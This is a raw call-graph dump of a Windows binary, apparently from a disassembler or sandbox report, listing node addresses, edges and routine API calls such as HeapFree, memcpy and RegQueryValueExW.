memcpy HeapFree 53843->53847 53844->53845 53846 7ff768bad1e5 53844->53846 53845->53836 53846->53843 53847->53845 53890 7ff768b780a6 53889->53890 53891 7ff768b780c0 53889->53891 53890->53889 53890->53891 53892 7ff768b780ac HeapFree 53890->53892 53893 7ff768c42c7f 53890->53893 53891->53751 53892->53890 53894 7ff768c42c99 53893->53894 53895 7ff768c42c85 HeapFree 53893->53895 53894->53751 53895->53894 53896->53751 53898 7ff768c9ab7b 53897->53898 53898->53751 53909 7ff768b82099 53910 7ff768b820a1 53909->53910 53911 7ff768bb09e0 5 API calls 53910->53911 53913 7ff768b82754 53910->53913 53912 7ff768b82131 53911->53912 53942 7ff768bb0dd0 53912->53942 53916 7ff768db9d40 4 API calls 53913->53916 53915 7ff768b82141 53918 7ff768bb09e0 5 API calls 53915->53918 53917 7ff768b827bb 53916->53917 53919 7ff768b821fe 53918->53919 53920 7ff768b8221a 53919->53920 53921 7ff768b82203 HeapFree 53919->53921 53922 7ff768b8223c 53920->53922 53923 7ff768b82225 HeapFree 53920->53923 53921->53920 53953 7ff768b755ab 53922->53953 53923->53922 53926 7ff768b822c6 53928 7ff768b8230c 53926->53928 53930 7ff768b82365 memcpy memcpy 53926->53930 53927 7ff768b82286 53927->53928 53929 7ff768b822af HeapFree 53927->53929 53931 7ff768b82716 53928->53931 53932 7ff768b82710 HeapFree 53928->53932 53929->53928 53936 7ff768b823df 53930->53936 53933 7ff768b8271c HeapFree 53931->53933 53934 7ff768b8272f 53931->53934 53932->53931 53933->53934 53936->53913 53936->53928 53937 7ff768bad0e0 3 API calls 53936->53937 53940 7ff768b8251c 53936->53940 53938 7ff768b8259c 53937->53938 53938->53913 53939 7ff768b825a5 53938->53939 53939->53940 53958 7ff768db9099 10 API calls 53939->53958 53959 7ff768b78ad9 HeapFree HeapFree HeapFree HeapFree 53940->53959 53943 7ff768bb0e3e 53942->53943 53952 7ff768bb0e51 53942->53952 53944 7ff768bad0e0 3 API calls 53943->53944 53951 7ff768bb11b6 53943->53951 53944->53952 53945 7ff768bb14cd 53945->53915 53946 7ff768db9d40 4 API calls 53947 7ff768bb1565 53946->53947 53948 7ff768bb02e0 HeapFree 53947->53948 53949 7ff768bb15ee 53948->53949 53949->53915 53950 7ff768bb0cb0 memcpy 53950->53952 53951->53946 53952->53945 53952->53950 53952->53951 53954 7ff768c7c630 24 API calls 53953->53954 53955 7ff768b755cf 53954->53955 53956 7ff768b755ee 53955->53956 53957 7ff768b755d5 HeapFree 53955->53957 53956->53926 53956->53927 53957->53956 53958->53939 53959->53928 53960 7ff768b82cd8 53961 7ff768b82d6c 53960->53961 53964 7ff768b82d04 53960->53964 53962 7ff768b82f1b 53961->53962 53963 7ff768b82f04 HeapFree 53961->53963 53966 7ff768b82f34 53962->53966 53967 7ff768b82f21 HeapFree 53962->53967 53963->53962 53975 7ff768b82d56 53964->53975 54515 7ff768b741dd 53964->54515 53967->53966 53970 7ff768bad0e0 3 API calls 53971 7ff768b82dd6 53970->53971 53972 7ff768b82fb1 53971->53972 53977 7ff768b82ddf 53971->53977 53973 7ff768db9d40 4 API calls 53972->53973 53978 7ff768b82fc0 53973->53978 53974 7ff768b741dd 30 API calls 53974->53977 55117 7ff768b78ad9 HeapFree HeapFree HeapFree HeapFree 53975->55117 53977->53974 53977->53975 55116 7ff768db915d 10 API calls 53977->55116 53979 7ff768befd87 4 API calls 53978->53979 53980 7ff768b83115 53979->53980 53981 7ff768bb09e0 5 API calls 53980->53981 53982 7ff768b8321c 53981->53982 53983 7ff768b83239 53982->53983 53984 7ff768b83222 HeapFree 53982->53984 53985 7ff768c67140 32 API calls 53983->53985 53984->53983 53986 7ff768b83267 53985->53986 53987 7ff768b832e9 53986->53987 53988 7ff768b832d7 HeapFree 53986->53988 53989 7ff768b832f4 HeapFree 53987->53989 53990 7ff768b8330b 53987->53990 53988->53987 53989->53990 54531 7ff768bfb107 53990->54531 53992 7ff768b841cd 53993 7ff768b7996a 2 API calls 53992->53993 53994 7ff768b84234 53993->53994 53995 7ff768befd87 4 API calls 53994->53995 53996 7ff768b842d2 53995->53996 53996->53996 53997 7ff768befd87 4 API calls 53996->53997 53999 7ff768b8435c 53997->53999 55108 7ff768b74e32 53999->55108 54001 7ff768befd87 4 API calls 54003 7ff768b83855 memcpy 54001->54003 55118 7ff768b8e281 18 API calls 54003->55118 54006 7ff768b843b8 HeapFree 54007 7ff768b843c7 54006->54007 54007->54007 54008 7ff768befd87 4 API calls 54007->54008 54011 7ff768b844c9 54008->54011 54010 7ff768befd87 4 API calls 54012 7ff768b83b93 memcpy 54010->54012 54011->54011 54013 7ff768befd87 4 API calls 54011->54013 54030 7ff768b83637 54012->54030 54015 7ff768b84562 54013->54015 54016 7ff768b74e32 11 API calls 54015->54016 54017 7ff768befd87 4 API calls 54020 7ff768b83ea0 memcpy 54017->54020 54019 7ff768b8408d memcpy 54023 7ff768b840ec memcpy 54019->54023 54020->54030 54025 7ff768b8412b memcpy 54023->54025 55096 7ff768b79c3f 54025->55096 54030->53992 54030->54001 54030->54010 54030->54017 54030->54019 54034 7ff768b8419d HeapFree 54030->54034 54538 7ff768b827bd 54030->54538 55081 7ff768b7a069 54030->55081 55085 7ff768b81f59 54030->55085 55092 7ff768b7a0cb 54030->55092 55102 7ff768b79acc 54030->55102 55119 7ff768b79364 HeapFree HeapFree HeapFree HeapFree 54030->55119 55120 7ff768b8e4f2 18 API calls 54030->55120 55121 7ff768b792f5 HeapFree HeapFree 54030->55121 55122 7ff768b79b23 HeapFree 54030->55122 54034->54030 54518 7ff768b74205 54515->54518 54517 7ff768b7456e HeapFree 54517->54518 54518->54517 54519 7ff768b80ba5 19 API calls 54518->54519 54520 7ff768b745fe HeapFree 54518->54520 54521 7ff768b74628 HeapFree 54518->54521 54522 7ff768b7469b HeapFree 54518->54522 54523 7ff768b746cc HeapFree 54518->54523 54524 7ff768b80ce3 18 API calls 54518->54524 54525 7ff768b748e4 HeapFree 54518->54525 54526 7ff768b74763 HeapFree 54518->54526 54527 7ff768b74858 HeapFree 54518->54527 54528 7ff768b74811 HeapFree 54518->54528 54529 7ff768b7489f HeapFree 54518->54529 54530 7ff768b74905 54518->54530 55123 7ff768b80ae0 19 API calls 54518->55123 54519->54518 54520->54518 54521->54518 54522->54518 54523->54518 54524->54518 54525->54518 54526->54518 54527->54518 54528->54518 54529->54518 54530->53970 54530->53975 54532 7ff768bfb12b 54531->54532 54535 7ff768bfb173 54531->54535 54533 7ff768bad0e0 3 API calls 54532->54533 54534 7ff768bfb16e 54532->54534 54533->54534 54534->54535 54536 7ff768db9d40 4 API calls 54534->54536 54535->54030 54537 7ff768bfb201 54536->54537 54539 7ff768bb09e0 5 API calls 54538->54539 54540 7ff768b8282d 54539->54540 54541 7ff768c67140 32 API calls 54540->54541 54542 7ff768b8284e 54541->54542 54543 7ff768db9d40 4 API calls 54542->54543 54544 7ff768b82fc0 54543->54544 54545 7ff768befd87 4 API calls 54544->54545 54546 7ff768b83115 54545->54546 54547 7ff768bb09e0 5 API calls 54546->54547 54548 7ff768b8321c 54547->54548 54549 7ff768b83239 54548->54549 54550 7ff768b83222 HeapFree 54548->54550 54551 7ff768c67140 32 API calls 54549->54551 54550->54549 54552 7ff768b83267 54551->54552 54553 7ff768b832e9 54552->54553 54554 7ff768b832d7 HeapFree 54552->54554 54555 7ff768b832f4 HeapFree 54553->54555 54556 7ff768b8330b 54553->54556 54554->54553 54555->54556 54557 7ff768bfb107 4 API calls 54556->54557 55082 7ff768b7a0c4 55081->55082 55084 7ff768b7a0ae 55081->55084 55082->54030 55084->55082 55129 7ff768b79364 HeapFree HeapFree HeapFree HeapFree 55084->55129 55086 7ff768bb09e0 5 API calls 55085->55086 55087 7ff768b81fc9 55086->55087 55088 7ff768c67140 32 API calls 55087->55088 55089 7ff768b81fea 55088->55089 55090 7ff768db9d40 4 API calls 55089->55090 55091 7ff768b827bb 55090->55091 55093 7ff768b7a0f9 55092->55093 55094 7ff768b7a113 55092->55094 55093->55094 55130 7ff768b792f5 HeapFree HeapFree 55093->55130 55094->54030 55097 7ff768b79c6c 55096->55097 55098 7ff768b79c52 55096->55098 55099 7ff768b79c8d 55097->55099 55100 7ff768b79c72 HeapFree 55097->55100 55098->55097 55131 7ff768b792f5 HeapFree HeapFree 55098->55131 55099->54030 55100->55099 55103 7ff768b79af9 55102->55103 55104 7ff768b79adf 55102->55104 55105 7ff768b79b1a 55103->55105 55106 7ff768b79aff HeapFree 55103->55106 55104->55103 55132 7ff768b79364 HeapFree HeapFree HeapFree HeapFree 55104->55132 55105->54030 55106->55105 55109 7ff768b74e96 55108->55109 55110 7ff768b74f20 memcmp 55109->55110 55112 7ff768b74fe2 55109->55112 55110->55109 55111 7ff768b74f37 55110->55111 55113 7ff768b74fa6 HeapFree 55111->55113 55115 7ff768b75063 55111->55115 55112->55115 55133 7ff768db978e 55112->55133 55113->55112 55115->54006 55115->54007 55116->53977 55117->53961 55118->54030 55119->54030 55120->54030 55121->54030 55122->54030 55123->54518 55129->55084 55130->55093 55131->55098 55132->55104 55134 7ff768db97c1 55133->55134 55135 7ff768db9a2d 55133->55135 55136 7ff768db97e9 55134->55136 55137 7ff768db980c 55134->55137 55136->55135 55145 7ff768bdd1be 55136->55145 55153 7ff768b81324 memcpy memcpy 55137->55153 55139 7ff768db9826 55139->55115 55142 7ff768db9892 memset 55146 7ff768bdd1d1 55145->55146 55147 7ff768bdd207 55145->55147 55146->55147 55148 7ff768bad0e0 3 API calls 55146->55148 55151 7ff768bdd20f 55147->55151 55155 7ff768bdcfd0 HeapAlloc GetProcessHeap HeapAlloc HeapReAlloc 55147->55155 55150 7ff768bdd205 RtlAllocateHeap 55148->55150 55150->55147 55151->55139 55151->55142 55153->55139 55156 7ff768b9eae5 55656 7ff768b72bf9 55156->55656 55158 7ff768b9eb46 55159 7ff768b9eb4b 55158->55159 55166 7ff768b9ebac 55158->55166 55160 7ff768b9eb60 HeapFree 55159->55160 55161 7ff768b9ec77 55159->55161 55160->55161 55164 7ff768bad0e0 3 API calls 55161->55164 55171 7ff768b9eca9 55161->55171 55162 7ff768b9ec24 55162->55161 55163 7ff768b9ec61 HeapFree 55162->55163 55163->55161 55167 7ff768b9ec8b 55164->55167 55165 7ff768babc55 56219 7ff768db8c90 14 API calls 55165->56219 55166->55162 55166->55165 55169 7ff768bad0e0 3 API calls 55167->55169 55173 7ff768b9ea9f 55167->55173 55169->55171 55170 7ff768babc6f 56220 7ff768b78a5b HeapFree HeapFree HeapFree HeapFree HeapFree 55170->56220 55171->55173 55724 7ff768b77b28 55171->55724 55176 7ff768bac7ff 55177 7ff768b9ed74 55178 7ff768befd87 4 API calls 55177->55178 55197 7ff768ba4cf2 55177->55197 55179 7ff768b9ee55 55178->55179 55180 7ff768b9ee83 55179->55180 55181 7ff768c51b93 10 API calls 55179->55181 55731 7ff768c5897d 55180->55731 55181->55180 55184 7ff768bb09e0 5 API calls 55185 7ff768b9efa7 55184->55185 55186 7ff768b9efc0 55185->55186 55187 7ff768c51b93 10 API calls 55185->55187 55188 7ff768c5897d memcmp 55186->55188 55187->55186 55189 7ff768b9f085 55188->55189 55190 7ff768bb09e0 5 API calls 55189->55190 55189->55197 55191 7ff768b9f10b 55190->55191 55192 7ff768b9f11d 55191->55192 55193 7ff768c51b93 10 API calls 55191->55193 55194 7ff768c5897d memcmp 55192->55194 55193->55192 55195 7ff768b9f1b0 55194->55195 55196 7ff768bb09e0 5 API calls 55195->55196 55195->55197 55198 7ff768b9f236 55196->55198 55199 7ff768b9f248 55198->55199 55200 7ff768c51b93 10 API calls 55198->55200 55201 7ff768c5897d memcmp 55199->55201 55200->55199 55202 7ff768b9f2ee 55201->55202 55202->55197 55203 7ff768bb09e0 5 API calls 55202->55203 55204 7ff768b9f374 55203->55204 55205 7ff768b9f386 55204->55205 55206 7ff768c51b93 10 API calls 55204->55206 55207 7ff768c5897d memcmp 55205->55207 55206->55205 55208 7ff768b9f421 55207->55208 55209 7ff768c5897d memcmp 55208->55209 55296 7ff768babc7e 56222 7ff768c61400 HeapFree HeapFree 55296->56222 55660 7ff768b72c1f 55656->55660 55672 7ff768b72c5a 55656->55672 55658 7ff768b72c78 55661 7ff768b72c81 55658->55661 55666 7ff768b72e8e 55658->55666 55670 7ff768b72c6e 55658->55670 55659 7ff768b72cbf 55662 7ff768b72f2a 55659->55662 55663 7ff768b72cc8 55659->55663 55660->55658 55660->55659 55660->55672 55665 7ff768b72f92 55661->55665 55669 7ff768b73477 55661->55669 55661->55670 56232 7ff768c58a78 15 API calls 55662->56232 55663->55661 55663->55665 55668 7ff768b72cda 55663->55668 56233 7ff768b72aa5 14 API calls 55665->56233 55666->55672 55681 7ff768b72e97 55666->55681 55667 7ff768b72f4a 55667->55670 55676 7ff768befd87 4 API calls 55667->55676 55668->55672 55695 7ff768b72ce3 55668->55695 56252 7ff768db8c90 14 API calls 55669->56252 55670->55158 56223 7ff768db8c90 14 API calls 55672->56223 55673 7ff768b72ff1 55673->55670 56234 7ff768c58098 HeapFree HeapFree HeapFree HeapFree HeapFree 55673->56234 55675 7ff768b72ee0 56231 7ff768db8c90 14 API calls 55675->56231 55677 7ff768b72f65 memcpy 55676->55677 55682 7ff768b7301f 55677->55682 55681->55675 55684 7ff768b7306d 55681->55684 55699 7ff768b72ef4 55681->55699 55682->55670 56258 7ff768db9047 15 API calls 55682->56258 56235 7ff768c58a78 15 API calls 55684->56235 55686 7ff768b733a1 55689 7ff768b733a9 HeapFree 55686->55689 55696 7ff768b7303d 55686->55696 55687 7ff768b73090 55687->55699 56236 7ff768c49f27 55687->56236 55688 7ff768b7337b 55688->55686 56251 7ff768b78a5b HeapFree HeapFree HeapFree HeapFree HeapFree 55688->56251 55689->55696 55690 7ff768b72bf9 30 API calls 55690->55695 55695->55688 55695->55690 55695->55696 55705 7ff768b72d3b 55695->55705 56224 7ff768c95918 55695->56224 55698 7ff768b7346c 55696->55698 56253 7ff768db8c90 14 API calls 55696->56253 55700 7ff768b7365e 55698->55700 55701 7ff768b73547 55698->55701 55699->55698 55721 7ff768b73735 55699->55721 56255 7ff768db8c90 14 API calls 55699->56255 55700->55682 56257 7ff768b78a5b HeapFree HeapFree HeapFree HeapFree HeapFree 55700->56257 55701->55682 56256 7ff768b78a04 HeapFree HeapFree 55701->56256 55704 7ff768b730e5 55707 7ff768b730eb 55704->55707 55708 7ff768b73121 55704->55708 56250 7ff768db8c90 14 API calls 55705->56250 55707->55699 55710 7ff768b730f9 HeapFree 55707->55710 56244 7ff768c56c0a 7 API calls 55708->56244 55710->55699 55712 7ff768b73167 55720 7ff768b73179 55712->55720 56245 7ff768b78a5b HeapFree HeapFree HeapFree HeapFree HeapFree 55712->56245 55715 7ff768b731d9 55715->55699 56254 7ff768db8c90 14 API calls 55715->56254 55717 7ff768c49f27 4 API calls 55718 7ff768b73277 memcpy 55717->55718 56247 7ff768b7e930 14 API calls 55718->56247 55720->55699 55720->55715 55720->55717 56246 7ff768c58a78 15 API calls 55720->56246 56248 7ff768c56c0a 7 API calls 55720->56248 56249 7ff768b78a5b HeapFree HeapFree HeapFree HeapFree HeapFree 55720->56249 55726 7ff768b77b29 55724->55726 55725 7ff768b77b7f 55725->55177 55726->55725 56259 7ff768b78f21 HeapFree 55726->56259 55732 7ff768b9ef16 55731->55732 55733 7ff768c58997 55731->55733 55732->55184 55732->55197 55733->55732 55734 7ff768c589ed memcmp 55733->55734 55734->55733 56219->55170 56220->55296 56222->55176 56223->55670 56225 7ff768c95928 56224->56225 56226 7ff768c959bf 56224->56226 56227 7ff768c51b12 9 API calls 56225->56227 56226->55695 56228 7ff768c9599c 56227->56228 56228->56226 56229 7ff768db9d40 4 API calls 56228->56229 56230 7ff768c959da 56229->56230 56231->55699 56232->55667 56233->55673 56234->55682 56235->55687 56237 7ff768c49f35 56236->56237 56242 7ff768b730b1 memcpy 56236->56242 56238 7ff768c49f70 56237->56238 56239 7ff768bad0e0 3 API calls 56237->56239 56240 7ff768c49f4c 56239->56240 56241 7ff768db9d40 4 API calls 56240->56241 56240->56242 56241->56242 56243 7ff768b7e930 14 API calls 56242->56243 56243->55704 56244->55712 56245->55720 56246->55720 56247->55720 56248->55720 56249->55720 56250->55688 56251->55688 56252->55682 56253->55698 56254->55699 56255->55698 56257->55682 56258->55670 56427 7ff768b738ed HeapFree 56428 7ff768b73908 memcpy 56427->56428 56432 7ff768b73978 56427->56432 56429 7ff768b73946 56428->56429 56430 7ff768b73959 memcpy 56429->56430 56431 7ff768b73a48 56430->56431 56430->56432 56433 7ff768b7921d 12 API calls 56431->56433 56433->56432 56434 7ff768bb5172 56435 7ff768bb5194 56434->56435 56436 7ff768bb51fa 56434->56436 56437 7ff768bb527e 56435->56437 56441 7ff768bb5265 56435->56441 56442 7ff768bb51af 56435->56442 56438 7ff768bb5219 memcpy 56436->56438 56439 7ff768bb523c 56436->56439 56451 7ff768bb471f 56437->56451 56438->56441 56439->56441 56443 7ff768dbef78 10 API calls 56439->56443 56442->56441 56445 7ff768bb5307 56442->56445 56447 7ff768bb51e5 memcpy 56442->56447 56443->56441 56444 7ff768bb52a1 56462 7ff768bb49a6 11 API calls 56444->56462 56445->56441 56450 7ff768dbef78 10 API calls 56445->56450 56447->56441 56448 7ff768bb52c9 56463 7ff768bb495a HeapFree HeapFree 56448->56463 56450->56441 56452 7ff768bb473c 56451->56452 56453 7ff768bb472c 56451->56453 56452->56444 56454 7ff768bb4732 56453->56454 56455 7ff768bb4743 56453->56455 56459 7ff768bb4750 56453->56459 56464 7ff768bad260 56454->56464 56457 7ff768bad0e0 3 API calls 56455->56457 56457->56459 56459->56452 56460 7ff768db9d40 4 API calls 56459->56460 56461 7ff768bb4775 56460->56461 56461->56444 56462->56448 56463->56441 56465 7ff768bad274 GetProcessHeap 56464->56465 56466 7ff768bad289 HeapAlloc 56464->56466 56467 7ff768bad27f 56465->56467 56468 7ff768bad29d RtlAllocateHeap 56465->56468 56466->56468 56467->56466 56468->56452 56469 7ff768bd03f4 56470 7ff768bd040f 56469->56470 56473 7ff768bd03ac 56469->56473 56471 7ff768bd0421 memcmp 56470->56471 56470->56473 56472 7ff768bd0446 56471->56472 56471->56473 56473->56472 56474 7ff768bd0770 56473->56474 56477 7ff768bd0831 56473->56477 56475 7ff768bd077d 56474->56475 56476 7ff768bd0afe 56474->56476 56475->56472 56483 7ff768bd0b18 10 API calls 56475->56483 56485 7ff768dbb1c8 HeapAlloc GetProcessHeap HeapAlloc HeapReAlloc 56476->56485 56477->56476 56479 7ff768bd0852 56477->56479 56479->56472 56484 7ff768bd0b18 10 API calls 56479->56484 56483->56472 56484->56472 56486 7ff768c7d41a 56487 7ff768c7d489 56486->56487 56491 7ff768c7d430 56486->56491 56493 7ff768c7d4b7 56487->56493 56504 7ff768c7e0a6 ReleaseSRWLockExclusive AcquireSRWLockExclusive 56487->56504 56489 7ff768c7d4a9 56489->56493 56494 7ff768c7d556 56489->56494 56492 7ff768c7d469 56491->56492 56495 7ff768c7deca 9 API calls 56491->56495 56503 7ff768c7de83 HeapFree HeapFree 56491->56503 56492->56487 56496 7ff768c7d473 HeapFree 56492->56496 56497 7ff768c7d4c5 HeapFree 56493->56497 56500 7ff768c7d4db 56493->56500 56505 7ff768dbbbc1 HeapAlloc GetProcessHeap HeapAlloc HeapReAlloc 56494->56505 56495->56491 56496->56487 56497->56500 56501 7ff768c7d53b 56500->56501 56502 7ff768c7d521 HeapFree 56500->56502 56502->56501 56503->56491 56504->56489 56506 7ff768b82a67 HeapFree 56507 7ff768b82a89 HeapFree 56506->56507 56508 7ff768b82aa0 56506->56508 56507->56508 56509 7ff768b755ab 25 API calls 56508->56509 56510 7ff768b82ae4 56509->56510 56511 7ff768b82ef9 56510->56511 56512 7ff768b82b13 HeapFree 56510->56512 56513 7ff768b82f1b 56511->56513 56514 7ff768b82f04 HeapFree 56511->56514 56512->56511 56515 7ff768b82f34 56513->56515 56516 7ff768b82f21 HeapFree 56513->56516 56514->56513 56516->56515 56517 7ff768b71173 56549 7ff768bd19d3 56517->56549 56519 7ff768b71316 SafeArrayDestroy 56532 7ff768b71083 56519->56532 56520 7ff768b724d9 56521 7ff768b722b9 HeapFree 56521->56532 56522 7ff768befd87 4 API calls 56523 7ff768b7148e memcpy 56522->56523 56524 7ff768c959dc SysAllocStringLen 56523->56524 56524->56532 56525 7ff768b72310 HeapFree 56525->56532 56526 7ff768b71ef8 SysFreeString 56526->56532 56527 7ff768b7218f SysFreeString 56527->56532 56528 7ff768b71816 VariantClear 56529 7ff768b7186b SysFreeString 56528->56529 56528->56532 56556 7ff768b7f388 6 API calls 56529->56556 56531 7ff768b71fba SysFreeString 56531->56532 56532->56517 56532->56519 56532->56520 56532->56521 56532->56522 56532->56525 56532->56526 56532->56527 56532->56528 56532->56531 56533 7ff768b71a02 memcmp 56532->56533 56534 7ff768b71aac HeapFree 56532->56534 56536 7ff768b71b10 56532->56536 56533->56532 56534->56532 56537 7ff768db9a34 56536->56537 56538 7ff768db9cd1 56537->56538 56539 7ff768db9a67 56537->56539 56540 7ff768db9ab2 56539->56540 56541 7ff768db9a8f 56539->56541 56557 7ff768b81324 memcpy memcpy 56540->56557 56541->56538 56543 7ff768bdd1be 5 API calls 56541->56543 56544 7ff768db9b2b 56543->56544 56545 7ff768db9acc 56544->56545 56546 7ff768db9b38 memset 56544->56546 56545->56536 56548 7ff768db9b86 56546->56548 56558 7ff768c0395f HeapFree 56548->56558 56550 7ff768bd19e2 56549->56550 56551 7ff768bd1a2b 56549->56551 56552 7ff768bd1a26 56550->56552 56553 7ff768bad0e0 3 API calls 56550->56553 56551->56532 56552->56551 56554 7ff768db9d40 4 API calls 56552->56554 56553->56552 56555 7ff768bd1a57 56554->56555 56556->56532 56557->56545 56558->56545 56559 7ff768b76bf3 56560 7ff768b76bfa 56559->56560 56561 7ff768c97a30 6 API calls 56560->56561 56562 7ff768b76c10 56561->56562 56563 7ff768c97a30 6 API calls 56562->56563 56596 7ff768b76e76 56562->56596 56564 7ff768b76c47 56563->56564 56565 7ff768c97a30 6 API calls 56564->56565 56564->56596 56566 7ff768b76c80 56565->56566 56567 7ff768c97a30 6 API calls 56566->56567 56566->56596 56568 7ff768b76ca4 56567->56568 56569 7ff768c97a30 6 API calls 56568->56569 56568->56596 56570 7ff768b76ccd 56569->56570 56571 7ff768c97a30 6 API calls 56570->56571 56570->56596 56572 7ff768b76cf6 56571->56572 56573 7ff768c97a30 6 API calls 56572->56573 56572->56596 56574 7ff768b76d19 56573->56574 56575 7ff768c97a30 6 API calls 56574->56575 56574->56596 56576 7ff768b76d40 56575->56576 56577 7ff768c97a30 6 API calls 56576->56577 56576->56596 56578 7ff768b76d61 56577->56578 56579 7ff768c97a30 6 API calls 56578->56579 56578->56596 56580 7ff768b76d82 56579->56580 56581 7ff768c97a30 6 API calls 56580->56581 56580->56596 56582 7ff768b76da3 56581->56582 56583 7ff768c97a30 6 API calls 56582->56583 56582->56596 56584 7ff768b76dc7 56583->56584 56585 7ff768c97a30 6 API calls 56584->56585 56584->56596 56586 7ff768b76df0 56585->56586 56587 7ff768c97a30 6 API calls 56586->56587 56586->56596 56588 7ff768b76e09 56587->56588 56589 7ff768c97a30 6 API calls 56588->56589 56588->56596 56590 7ff768b76e2a 56589->56590 56591 7ff768c97a30 6 API calls 56590->56591 56590->56596 56593 7ff768b769db 56591->56593 56592 7ff768c64e00 2 API calls 56594 7ff768b76e70 56592->56594 56595 7ff768c97a30 6 API calls 56593->56595 56593->56596 56629 7ff768b76bb8 56593->56629 56594->56596 56597 7ff768b77058 56594->56597 56599 7ff768b76ed6 56594->56599 56598 7ff768b76a88 56595->56598 56600 7ff768c97a30 6 API calls 56597->56600 56598->56596 56603 7ff768c97a30 6 API calls 56598->56603 56601 7ff768befd87 4 API calls 56599->56601 56609 7ff768b76aae 56603->56609 56609->56596 56614 7ff768c97a30 6 API calls 56609->56614 56629->56592 56629->56596 56657 7ff768bf682a 56658 7ff768bf6864 56657->56658 56659 7ff768bf689d 56658->56659 56661 7ff768c5df70 HeapAlloc GetProcessHeap HeapAlloc HeapReAlloc 56658->56661 56663 7ff768bf6877 56658->56663 56664 7ff768bf6937 WaitOnAddress 56658->56664 56666 7ff768bf69a3 CloseHandle 56658->56666 56659->56663 56669 7ff768c42c9a 56659->56669 56660 7ff768bf6a28 56665 7ff768bf6a48 56660->56665 56773 7ff768c042d4 HeapFree HeapFree HeapFree 56660->56773 56661->56658 56664->56658 56664->56664 56665->56663 56667 7ff768bf6aff CloseHandle 56665->56667 56666->56658 56667->56665 56670 7ff768c42caa 56669->56670 56672 7ff768c42d49 56669->56672 56671 7ff768c51b12 9 API calls 56670->56671 56673 7ff768c42d26 56671->56673 56672->56660 56673->56672 56674 7ff768db9d40 4 API calls 56673->56674 56675 7ff768c42d64 56674->56675 56774 7ff768c45a5b 56675->56774 56677 7ff768c42d93 56678 7ff768c42df8 56677->56678 56679 7ff768c42de6 HeapFree 56677->56679 56680 7ff768c42e0c 56678->56680 56681 7ff768c42dfc 56678->56681 56679->56678 56778 7ff768c458f0 56680->56778 56682 7ff768bfb203 4 API calls 56681->56682 56688 7ff768c42e04 56682->56688 56685 7ff768c42e2a 56704 7ff768c42ec1 56685->56704 56802 7ff768bfb203 56685->56802 56686 7ff768c42e3a 56789 7ff768c45a36 56686->56789 56687 7ff768c42e77 56690 7ff768c45a36 5 API calls 56687->56690 56693 7ff768c42ead HeapFree 56688->56693 56690->56685 56692 7ff768c42e45 56694 7ff768c458f0 13 API calls 56692->56694 56693->56704 56695 7ff768c42e5f 56694->56695 56695->56685 56696 7ff768c44077 56695->56696 56714 7ff768c43220 56695->56714 56734 7ff768c43f88 56695->56734 56826 7ff768dbf067 10 API calls 56696->56826 56697 7ff768c45a36 5 API calls 56697->56685 56699 7ff768c42f7d 56701 7ff768c42f7b 56699->56701 56702 7ff768c42f85 HeapFree 56699->56702 56700 7ff768c42f23 56808 7ff768c440fc 99 API calls 56700->56808 56810 7ff768c440fc 99 API calls 56701->56810 56702->56701 56704->56699 56704->56700 56706 7ff768c42f4d 56706->56701 56809 7ff768c440fc 99 API calls 56706->56809 56707 7ff768c42fc3 56708 7ff768c42ff1 56707->56708 56811 7ff768c440fc 99 API calls 56707->56811 56711 7ff768c42ffe 56708->56711 56712 7ff768c4304f 56708->56712 56715 7ff768c430e5 56711->56715 56718 7ff768c43038 HeapFree 56711->56718 56712->56715 56719 7ff768c43115 56712->56719 56732 7ff768c4307b 56712->56732 56713 7ff768c43416 56716 7ff768bbeb00 memcmp 56713->56716 56713->56734 56714->56713 56813 7ff768c51c66 14 API calls 56714->56813 56814 7ff768c56114 11 API calls 56714->56814 56720 7ff768bad0e0 3 API calls 56715->56720 56741 7ff768c43b3c 56716->56741 56718->56715 56725 7ff768c4312e HeapFree 56719->56725 56737 7ff768c43140 56719->56737 56722 7ff768c436a6 56720->56722 56723 7ff768c436af 56722->56723 56724 7ff768db9d40 4 API calls 56722->56724 56723->56660 56738 7ff768c43cfa 56724->56738 56725->56737 56726 7ff768c43cd8 56823 7ff768c56114 11 API calls 56726->56823 56728 7ff768c43166 56812 7ff768c44169 24 API calls 56728->56812 56729 7ff768c43fb8 56733 7ff768c43fce HeapFree 56729->56733 56729->56734 56730 7ff768c4352f 56735 7ff768bbeb00 memcmp 56730->56735 56732->56728 56732->56730 56733->56734 56734->56685 56734->56697 56770 7ff768c43555 56735->56770 56736 7ff768c43171 56739 7ff768c4317a 56736->56739 56743 7ff768bb09e0 5 API calls 56736->56743 56740 7ff768c43633 56737->56740 56746 7ff768c4364a 56737->56746 56816 7ff768c442f7 97 API calls 56739->56816 56817 7ff768c04311 HeapFree HeapFree 56740->56817 56741->56722 56741->56726 56741->56738 56747 7ff768c56114 11 API calls 56741->56747 56745 7ff768c434a7 56743->56745 56744 7ff768c435df HeapFree 56744->56737 56815 7ff768c442f7 97 API calls 56745->56815 56751 7ff768c4366b HeapFree 56746->56751 56752 7ff768c4363d 56746->56752 56747->56741 56749 7ff768c434c7 56754 7ff768bb09e0 5 API calls 56749->56754 56751->56752 56818 7ff768c04311 HeapFree HeapFree 56752->56818 56754->56739 56755 7ff768c4351e 56755->56737 56755->56744 56756 7ff768bbeb00 memcmp 56756->56770 56757 7ff768c43fe9 56824 7ff768c44299 HeapFree memset 56757->56824 56759 7ff768c35df2 23 API calls 56759->56770 56761 7ff768c4403a 56825 7ff768c44299 HeapFree memset 56761->56825 56763 7ff768c44057 56763->56755 56764 7ff768c44060 HeapFree 56763->56764 56764->56755 56767 7ff768c49f27 4 API calls 56769 7ff768c439e0 memcpy 56767->56769 56768 7ff768bb09e0 5 API calls 56768->56770 56769->56770 56770->56755 56770->56756 56770->56757 56770->56759 56770->56761 56770->56767 56770->56768 56772 7ff768c43aaf HeapFree 56770->56772 56819 7ff768c87f38 HeapAlloc GetProcessHeap HeapAlloc HeapReAlloc 56770->56819 56820 7ff768bd1c12 19 API calls 56770->56820 56821 7ff768c44169 24 API calls 56770->56821 56822 7ff768c442f7 97 API calls 56770->56822 56772->56770 56773->56665 56776 7ff768c45a8a 56774->56776 56775 7ff768c45cee 56775->56677 56776->56775 56827 7ff768dbefab 10 API calls 56776->56827 56779 7ff768c45a5b 10 API calls 56778->56779 56780 7ff768c4591e 56779->56780 56781 7ff768befd87 4 API calls 56780->56781 56784 7ff768c45942 56781->56784 56782 7ff768c4595d RegQueryValueExW 56783 7ff768c459a5 56782->56783 56782->56784 56785 7ff768c459f3 56783->56785 56786 7ff768c459df HeapFree 56783->56786 56784->56782 56787 7ff768c45a11 HeapFree 56785->56787 56788 7ff768c42e23 56785->56788 56786->56785 56787->56788 56788->56685 